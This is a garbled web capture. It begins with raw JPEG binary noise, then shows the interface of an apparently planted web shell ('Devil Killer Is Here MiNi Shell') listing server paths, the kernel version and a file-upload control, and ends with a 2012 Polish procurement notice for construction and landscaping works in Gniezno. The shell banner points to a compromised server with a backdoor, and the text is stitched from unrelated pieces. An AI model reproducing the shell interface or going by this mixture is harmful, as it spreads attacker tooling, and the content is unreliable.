JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/229966-N-2012.html

<p class="kh_header"><b>Gniezno: Roboty budowlane, instalatorskie i wyposażeniowe na obiektach i terenach przy 
ul. Sobieskiego 20  w Gnieźnie w tym prace związane z odwodnieniem terenu; 
Roboty w zakresie kształtowania terenu w tym urządzanie terenów zieleni
przy ul. Sobieskiego 20  w Gnieźnie</b><br>
<b>Numer ogłoszenia: 229966 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gnieźnieński , ul. Jana Pawła II 9/10, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4240706, faks 061 4240770.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane, instalatorskie i wyposażeniowe na obiektach i terenach przy 
ul. Sobieskiego 20  w Gnieźnie w tym prace związane z odwodnieniem terenu; 
Roboty w zakresie kształtowania terenu w tym urządzanie terenów zieleni
przy ul. Sobieskiego 20  w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla zadań inwestycyjnych:
I. Roboty budowlane, instalatorskie i wyposażeniowe na obiektach i terenach przy 
ul. Sobieskiego 20  w Gnieźnie w tym prace związane z odwodnieniem terenu, 
w tym:
		1.Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia i drzwi 
		EI-60)
II. Roboty w zakresie kształtowania terenu w tym urządzanie terenów zieleni przy 
ul. Sobieskiego 20  w Gnieźnie, 
w tym: 
1.	Przygotowanie terenu pod inwestycję - rozbiórka budynku poczty;
2.	Przygotowanie terenu pod inwestycję - roboty rozbiórkowe;
3.	Monitoring zewnętrzny;
4.	Oświetlenie zewnętrzne;
5.	Mała architektura;
6.	Przebudowa ogrodzenia od strony ul. Sobieskiego;
7.	Wykonanie chodników;
8.	Przebudowa  drogi wewnętrznej; 
9.	Urządzanie terenów zieleni;
10.	Wykonanie wewnętrznej zasilającej instalacji  elektrycznej w PUP.

Roboty wymienione wyżej zostały pogrupowane w następujące grupy zadań:
Grupa robót nr 1 obejmująca przygotowanie terenu pod inwestycję - rozbiórka budynku poczty;
Grupa robót nr 2 obejmująca:
- Oświetlenie zewnętrzne,
- Monitoring zewnętrzny,
- Wykonanie wewnętrznej instalacji elektrycznej w PUP;
Grupa robót nr 3 obejmująca:
- Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia i drzwi EI-60),
- Przygotowanie terenu pod inwestycję - roboty rozbiórkowe,
- Mała architektura,
- Przebudowa ogrodzenia od strony ul. Sobieskiego,
- Wykonanie chodników,
- Przebudowa  drogi wewnętrznej,
- Urządzanie terenów zieleni.
Szczegółowy opis wykonania robót:
Grupa robót 1: Przygotowanie terenu pod inwestycję - rozbiórka budynku poczty;
Przygotowanie terenu pod inwestycję - rozbiórka budynku poczty: w skład zadania wchodzą roboty rozbiórkowe: instalacji wod-kan, instalacji co, instalacji elektrycznej oraz rozbiórki: dach, stropów, ścian, fundamentów, należy również uporządkować teren, wywieźć gruz i elementy z rozbiórki (rozebrane fragmenty instalacji wod.-kan., co, elektrycznej, pokrycia dachowego oraz wszystkie odpady powstałe w wyniku rozbiórki nie będącej gruzem budowlanym).
Grupa robót 2: Oświetlenie zewnętrzne; Monitoring zewnętrzny; Wykonanie wewnętrznej zasilającej instalacji  elektrycznej w PUP.
Oświetlenie zewnętrzne: zadanie należy wykonać zgodnie z projektem budowlanym, który został ograniczony (patrz przedmiar i szkic oświetlenia) do 20 opraw i słupów oświetleniowych. 
Przygotowana dokumentacja jest oparta na projekcie budowlano-wykonawczym dla rewitalizacji koszar i jest częścią - dokumentacji projektowej, ale ograniczonej do 20 punktów świetlnych. Na szkicu zaznaczono, które punkty świetlne z projektowanych będą obecnie wykorzystywane. Wymagania techniczne pozostają takie same jakby były wykonywane wszystkie.
Monitoring zewnętrzny: zadanie polega na zamontowaniu na słupach oświetlenia zewnętrznego 8 kamer zewnętrznych dających podgląd na otoczenie Budynku Głównego i Budynku Pracowni Gastronomicznej, pozostałe elementy monitoringu: urządzenie do cyfrowego zapisu obrazu, ułożenie kabli w wykopanym rowie kablowym. Lokalizacja kamer została określona na szkicu i załączona do dokumentacji przetargowej. Okablowanie pod kamery należy założyć i informacje te są zawarte w przedmiarze robót-0010101M.
Wykonanie wewnętrznej zasilającej instalacji  elektrycznej w PUP: zadanie polega na połączeniu złącza kablowego (ZK) wykonanego dla PUP przez ENEA Operator SP. z o.o. z będącą przedmiotem zamówienia rozdzielnią główną i dalej do obecnej rozdzielni na parterze PUP.
Grupa robót 3: Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia i drzwi EI-60); Przygotowanie terenu pod inwestycję - roboty rozbiórkowe; Mała architektura; Przebudowa ogrodzenia od strony ul. Sobieskiego; Wykonanie chodników; Przebudowa  drogi wewnętrznej; Urządzanie terenów zieleni.
Wykonanie ciągów ewakuacyjnych w budynku głównym (przejścia i drzwi EI-60): zadanie polega na połączeniu remontowanej części budynku głównego zajmowanej przez szkoły z częścią zajmowaną przez PUP, roboty będą wykonywane na parterze, I, II, III piętrze. Parter: rozebranie ścianek w dawnym magazynie PUP, wywiezienie gruzu, otynkowanie ościeży i malowanie oraz wykonanie ścianki działowej przegradzającej magazyn. I, II, III piętro: wykucie przejść na korytarz PUP oraz zamontowanie drzwi -  ze stali nierdzewnej ppoż. EI-60 (DP1) wraz z obrobieniem ościeży, zatynkowaniem i pomalowaniem.
Przygotowanie terenu pod inwestycję - roboty rozbiórkowe: w skład zadania wchodzą: rozebranie istniejących nawierzchni chodników wraz z krawężnikami, rozebranie murowanych część ogrodzenia od ulicy Sobieskiego, demontaż istniejącego ogrodzenia stalowego od schodów do bramy przy PUP z pozostawieniem Inwestorowi  stalowych elementów z rozbiórki płotu. Na odcinku od parku do schodów należy rozebrać tylko murowane części płotu, całość robót kończy uprzątnięcie i wywiezienie gruzu. 
Mała architektura: zadanie polega na zamontowaniu: ławek parkowych z oparciem - konstrukcja żeliwna z siedziskiem i oparciem z elementów drewnianych np. ławka krakowska lub równoważna, dł.=1700 mm, h=780mm, szer.=420 mm, ilość ławek 8 szt. - miejsce zamontowania wg załączonego schematu; koszy na śmieci: 5 szt. - wykonane z blachy: daszek 2 mm, obudowa 1,5 mm, stelaż: profil prostokątny o grubości 2 mm, całość ocynkowana ogniowo, malowana farbami proszkowymi;  obłożeniu stopni i podstopnic schodów od ulicy Sobieskiego granitem strzegomskim wraz z wykonaniem balustrady z kształtowników stalowych malowanych proszkowo.
Przebudowa ogrodzenia od strony ul. Sobieskiego: zadanie polega na wykonaniu nowego tynku cementowego na pozostawionym cokole od strony ulicy Sobieskiego oraz zeskrobanie i pomalowanie metalowych elementów ogrodzenia od parku do schodów i płotu wewnątrz, po uzupełnieniu elementami z rozbiórki płotu stalowego miejsc po rozebraniu elementów murowanych. 
Wykonanie chodników: zadanie polega na wykonaniu chodnika z kostki brukowej, szarej, betonowej, grubości 6 cm, na podsypce cementowo-piaskowej, spoiny wypełnione piskiem, obrzeże betonowe 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową.
Przebudowa  drogi wewnętrznej: zadanie polega na ręcznym rozebraniu nawierzchni bitumicznej z pozostawieniem i uzupełnieniem starego bruku wraz z wymianą po obu stronach krawężnika betonowego.
Urządzanie terenów zieleni: zadanie polega na: założeniu trawnika z ręcznym przekopaniem gleby, nawiezieniem i rozścieleniem warstwy 10 cm ziemi urodzajnej i zasianie trawy; wykonaniu skarpy przy cokole płotu od strony ulicy Sobieskiego do środka budynku głównego, zagęszczanie skarpy warstwami grubości 40 cm wraz z jej plantowaniem. 
Szczegółowy zakres prac określają dokumenty przedmiarowe do niniejszego przedsięwzięcia będące załącznikiem do SIWZ. W wersji elektronicznej zostały umieszczone przedmiary, projekt rozbiórki poczty, schemat oświetlenia zewnętrznego, usytuowania koszy, ławek oraz skarpy, folder: ogrodzenie - plan rozbiórek, zagospodarowanie terenu.
Pozostałe warunki wykonania zamówienia:
Zamawiający informuje, że na terenie objętym niniejszym zamówieniem realizuje zadanie Adaptacja budynków pokoszarowych przy ul. Sobieskiego 20 a Gnieźnie na cele oświatowe oraz organizacji pożytku publicznego.
Wykonawca ponosi pełną odpowiedzialność cywilną, a także za zniszczenia  spowodowane swoim działaniem lub niedopatrzeniem związanym z realizacją niniejszego zamówienia. 
Zobowiązuje się Wykonawcę do zapoznania się z miejscem wykonywania robót.
Zamawiający zobowiązuje się zgłosić rozpoczęcie i zakończenie prac do odpowiednich organów zgodnie z obowiązującymi przepisami. 
O wynagrodzeniu Wykonawcy decyduje niezmienne w trakcie trwania zamówienia wynagrodzenie ryczałtowe podane w formularzu ofertowym. 
Szczegółowe warunki płatności za wykonanie zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 8 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających w przypadku wystąpienia okoliczności, o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo zamówień publicznych do wysokości 10% wartości zamówienia podstawowego w zakresie tego samego rodzaju robót opisanych w przedmiocie zamówienia (pkt. 3 SIWZ)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.27.00-2, 45.31.43.00-4, 45.31.61.00-6, 45.21.42.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje roboty budowlane odpowiadające swoim rodzajem 
i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem rodzaju 
i zakresu zamówienia, wartości, terminu realizacji i nazwy, adresu, telefonu zamawiającego:
a) dla grupy robót 1: dwie roboty budowlane, rozbiórkowe o wartości 20 000,00 PLN każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
b) dla grupy robót 2: dwie roboty budowlane polegające na wykonaniu oświetlenia zewnętrznego i monitoringu zewnętrznego o wartości łącznej 50 000,00 PLN każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
c) dla grupy robót 3:
- 2 roboty budowlane polegające na wykonaniu nawierzchni z kostki brukowej o wartości 80 000,00 PLN każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
- 2 roboty budowlane polegające na urządzaniu terenów zieleni i wykonaniu małej architektury (ławki, kosze na śmiecie i schody zewnętrzne) o wartości łącznej 50 000,00 PLN każda, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączenia dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
Do spełnienia warunków udziału w postępowaniu konieczne jest, dla części robót 3, spełnienie obu warunków łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje personelem, który pod względem liczebności i kwalifikacji niezbędny jest do należytego wykonania zamówienia w danym terminie:
a) dla grupy robót 1 - przynajmniej jedna osoba posiadająca uprawnienia budowlane 
w specjalności konstrukcyjno-budowlane (uprawnienia ograniczone lub bez ograniczeń) 
z aktualnym zaświadczeniem o przynależności do Polskiej Izby Inżynierów Budownictwa, która obejmuje funkcję kierownika rozbiórki;
b) dla grupy robót 2  - przynajmniej jedna osoba posiadająca uprawnienia do kierowania robotami w branży elektrycznej w przypadku robót.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje personelem, który pod względem liczebności i kwalifikacji niezbędny jest do należytego wykonania zamówienia w danym terminie:
a) dla grupy robót 1 - przynajmniej jedna osoba posiadająca uprawnienia budowlane 
w specjalności konstrukcyjno-budowlane (uprawnienia ograniczone lub bez ograniczeń) 
z aktualnym zaświadczeniem o przynależności do Polskiej Izby Inżynierów Budownictwa, która obejmuje funkcję kierownika rozbiórki;
b) dla grupy robót 2  - przynajmniej jedna osoba posiadająca uprawnienia do kierowania robotami w branży elektrycznej w przypadku robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada opłaconą polisę  ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej:
a) dla grupy robót 1  - na kwotę minimum 35 000,00  PLN;
b) dla grupy robót 2  - na kwotę minimum 100 000,00  PLN;
c) dla grupy robót 1  - na kwotę minimum 200 000,00  PLN;
W przypadku złożenia oferty w niniejszym postępowaniu na więcej niż jedna grupa robót wymaganą wartość sumy ubezpieczenia polisy lub polis sumuje się.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o wykonaniu zadania samodzielnie lub przy pomocy podwykonawców wraz z wykazem prac, które Wykonawca zamierza powierzyć Podwykonawcy stanowiący załącznik nr 5 do SIWZ.  Ponadto Podwykonawca winien złożyć oświadczenie o nie podleganiu wykluczeniu z postępowania na druku stanowiącym załącznik nr 7 do SIWZ. Jeżeli wykonawca, wykazując spełnienie warunku, polega na zasobach innych podmiotów, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia, poprzez złożenie razem z ofertą oświadczenia o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ustawy Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy:
1. w stosunku do osób - zmiany osób reprezentujących na skutek zmian organizacyjnych,
2. zmiany danych adresowych - w przypadku zmiany siedziby,
3. w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego - np. obniżenie ceny,
4. możliwość zmiany terminu realizacji umowy w przypadku:
a.   odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
b.   konieczności usunięcia istotnych wad dokumentacji projektowej skutkujących koniecznością dokonania poprawek lub uzupełnień, jeśli uniemożliwia to lub istotnie wstrzymuje realizację robót;
c.  badań archeologicznych;
d.  gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego terminowego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gnieźnie, ul. Jana Pawła II 9/10, 62-200 Gniezno, I piętro, pokój 1.13.</p>
